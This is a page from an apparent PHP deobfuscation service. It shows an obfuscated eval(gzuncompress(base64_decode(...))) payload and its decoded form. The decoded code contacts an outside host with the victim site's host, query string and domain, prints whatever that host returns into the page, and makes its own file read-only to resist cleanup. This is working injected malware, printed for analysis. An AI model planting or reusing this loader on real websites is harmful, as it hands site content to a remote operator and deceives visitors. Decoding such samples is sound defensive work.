Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(stripslashes(gzuncompress(base64_decode('eJx1kVFPwjAUhd+X7D8sC3EjQQbIE2QRgygmij..

Decoded Output download


set_time_limit(0);

header("Content-Type: text/html;charset=gb2312");
date_default_timezone_set('PRC');
$TD_server = "http://fudanwypx.org/"; 
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);

echo $Content_mb;

$url1 = $_SERVER['PHP_SELF'];  
$filename1 = @end(explode('/',$url1));  
function set_writeable($file_name)
{
@chmod($file_name,0444);

} 
set_writeable($filename1);
cache_end($dir);

Did this file decode correctly?

Original Code

<?php eval(stripslashes(gzuncompress(base64_decode('eJx1kVFPwjAUhd+X7D8sC3EjQQbIE2QRgygmijimibGmKeuFNtnaZXQCGv+77WYUjb61p9+995xb29qAwopngFOeceV3mkPbsi0GhELhI3cshQKhjuN9DgNHwU4FTGXpMGGk0KXhetk76faQa8ooUYAprEiZ1j1fpQCsKR9582iMPAM14nMtFS9QOKGDXKZUPgiCVUmJ2O7zXVsW6wC5Q0eTTG4UFiSDQxK57QZeTKKHSfSEvGkcz/H0dhEj7/lQn0/n+nJ9oWUz8zMFzpbhiqeA1zp0Umsb/9tRG7kBFxR27Zzlp2Z8aMZ9+dDvR2WRhj893N1Poke8iKOr2aWxoSEqM8LFL64+4NnZzURj9Z4hYdI5sFeJDT2jqzP/k8cxuzExjCXDjUBQH3Z5KinoVQfIa1Utms2KXZUiUVwKx3z1tuAKyDIFv2pRxWra1pttjRKWSXogtzr9fr+2+a7b/FFdGTBEQhIG2NhoUF4Y5QNuk7wQ')))); ?>

Function Calls

gzuncompress 1
stripslashes 1
base64_decode 1

Variables

None

Stats

MD5 a463e2fc2d7720ec8e048a98eb0b18b7
Eval Count 1
Decode Time 78 ms